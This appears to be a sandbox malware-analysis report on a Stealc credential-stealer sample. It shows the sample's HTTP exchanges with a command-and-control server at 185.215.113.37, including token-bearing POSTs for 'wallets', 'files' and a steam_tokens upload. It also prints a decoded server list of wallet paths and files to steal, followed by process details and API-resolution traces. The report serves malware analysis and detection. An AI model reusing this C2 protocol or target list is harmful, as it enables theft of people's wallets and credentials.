42 46 48 49 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 2d 2d 0d 0a Data Ascii: ------KFBFCAFCBKFIEBFHIDBAContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------KFBFCAFCBKFIEBFHIDBAContent-Disposition: form-data; name="message"wallets------KFBFCAFCBKFIEBFHIDBA--
Oct 3, 2024 21:36:17.892347097 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:17 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Oct 3, 2024 21:36:17.895565033 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHDBGDHDAECBGDHJKFI Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------IEHDBGDHDAECBGDHJKFIContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------IEHDBGDHDAECBGDHJKFIContent-Disposition: form-data; name="message"files------IEHDBGDHDAECBGDHJKFI--
Oct 3, 2024 21:36:18.138001919 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 21:36:18.152721882 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFBAKEHIEBKJJJJJKKKE Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CFBAKEHIEBKJJJJJKKKEContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------CFBAKEHIEBKJJJJJKKKEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CFBAKEHIEBKJJJJJKKKEContent-Disposition: form-data; name="file"------CFBAKEHIEBKJJJJJKKKE--
Oct 3, 2024 21:36:18.874660969 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 21:36:18.902930021 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFI Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 2d 2d 0d 0a Data Ascii: ------DHDBGHCBAEGCBFHJEBFIContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------DHDBGHCBAEGCBFHJEBFIContent-Disposition: form-data; name="message"ybncbhylepme------DHDBGHCBAEGCBFHJEBFI--
Oct 3, 2024 21:36:19.145370007 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:19 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 5733 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 67 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 69 6e 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 70 74 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 64 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f [TRUNCATED] Data Ascii: .pl<br> 1.google.com.google.com<br>.ar<br> 1.google.com.google.com<br>.br<br> 1.google.com.google.com<br>.ec<br> 1.google.com.google.com<br>.eg<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.pt<br> 1.google.com.google.com<br>.ac<br> 1.google.com.google.com<br>.bd<br> 1.google.com.google.com<br>.zm<br> 1.google.com.google.com<br>.ve<br> 1.google.com.google.com<br>.pk<br> 1.google.com.google.com<br>.rs<br> 1.google.com.google.com<br>.ph<br> 1.google.com.google.com<br>.mx<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.th<br> 1.google.com.google.com<br>.id<br> 1.google.com.google.com<br>.tr<br> 1.google.com.google.com<br>.cz<br> 1.google.com.google.com<br>.io<br> 1.google.com.google.com<br>.dz<br> 1.google.com.google.com<br>.de<br> 1.google.com.google.com<br>.kr<br> 1.google.com.google.com<br>.ma<br> 1.google.com.google.com<br>.jp<br> 1.google.com.google.com
Oct 3, 2024 21:36:19.147209883 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFBAKEHIEBKJJJJJKKKE Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 2d 2d 0d 0a Data Ascii: ------CFBAKEHIEBKJJJJJKKKEContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------CFBAKEHIEBKJJJJJKKKEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------CFBAKEHIEBKJJJJJKKKE--
Oct 3, 2024 21:36:19.979604959 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:19 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	15:35:59
Start date:	03/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x340000
File size:	1'825'792 bytes
MD5 hash:	894A16433A404ABFCFE2097300DA90EF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2281603796.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2281603796.000000000134E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2054617135.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

Executed Functions

Function 00359860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,013606F0), ref: 003598A1
GetProcAddress.KERNEL32(75900000,01360600), ref: 003598BA
GetProcAddress.KERNEL32(75900000,013607F8), ref: 003598D2
GetProcAddress.KERNEL32(75900000,01360618), ref: 003598EA
GetProcAddress.KERNEL32(75900000,01360630), ref: 00359903
GetProcAddress.KERNEL32(75900000,01368B30), ref: 0035991B
GetProcAddress.KERNEL32(75900000,013567A0), ref: 00359933
GetProcAddress.KERNEL32(75900000,01356900), ref: 0035994C
GetProcAddress.KERNEL32(75900000,01360648), ref: 00359964
GetProcAddress.KERNEL32(75900000,01360660), ref: 0035997C
GetProcAddress.KERNEL32(75900000,01360708), ref: 00359995
GetProcAddress.KERNEL32(75900000,01360678), ref: 003599AD
GetProcAddress.KERNEL32(75900000,013569E0), ref: 003599C5
GetProcAddress.KERNEL32(75900000,01360750), ref: 003599DE
GetProcAddress.KERNEL32(75900000,01360720), ref: 003599F6
GetProcAddress.KERNEL32(75900000,013568C0), ref: 00359A0E
GetProcAddress.KERNEL32(75900000,01360738), ref: 00359A27
GetProcAddress.KERNEL32(75900000,013608D0), ref: 00359A3F
GetProcAddress.KERNEL32(75900000,013566C0), ref: 00359A57
GetProcAddress.KERNEL32(75900000,01360858), ref: 00359A70
GetProcAddress.KERNEL32(75900000,01356680), ref: 00359A88
LoadLibraryA.KERNEL32(01360888,?,00356A00), ref: 00359A9A
LoadLibraryA.KERNEL32(013608E8,?,00356A00), ref: 00359AAB
LoadLibraryA.KERNEL32(013608A0,?,00356A00), ref: 00359ABD
LoadLibraryA.KERNEL32(01360870,?,00356A00), ref: 00359ACF
LoadLibraryA.KERNEL32(01360900,?,00356A00), ref: 00359AE0
GetProcAddress.KERNEL32(75070000,013608B8), ref: 00359B02
GetProcAddress.KERNEL32(75FD0000,01360918), ref: 00359B23
GetProcAddress.KERNEL32(75FD0000,01368C58), ref: 00359B3B
GetProcAddress.KERNEL32(75A50000,01368DF0), ref: 00359B5D
GetProcAddress.KERNEL32(74E50000,01356800), ref: 00359B7E
GetProcAddress.KERNEL32(76E80000,01368AF0), ref: 00359B9F
GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00359BB6

Strings

NtQueryInformationProcess, xrefs: 00359BAA

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: ab4b9f6fa76291a090a3267e70030cc16ee200e467ccf80c57449b1f86eeaaea
Instruction ID: e6b83238ca2af01277eb418c40aa074ab618988316c6f535d4d2c7b71294388a
Opcode Fuzzy Hash: ab4b9f6fa76291a090a3267e70030cc16ee200e467ccf80c57449b1f86eeaaea
Instruction Fuzzy Hash: 08A15BB55002409FF348EFA8ED88A6637F9F768701704651BAE45F3225D739A44AFF22

Function 003445C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 0034460F
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0034479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003446B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003445F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003446CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003446C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003446AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003445D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003445C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003445DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003446D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003445E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344713

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
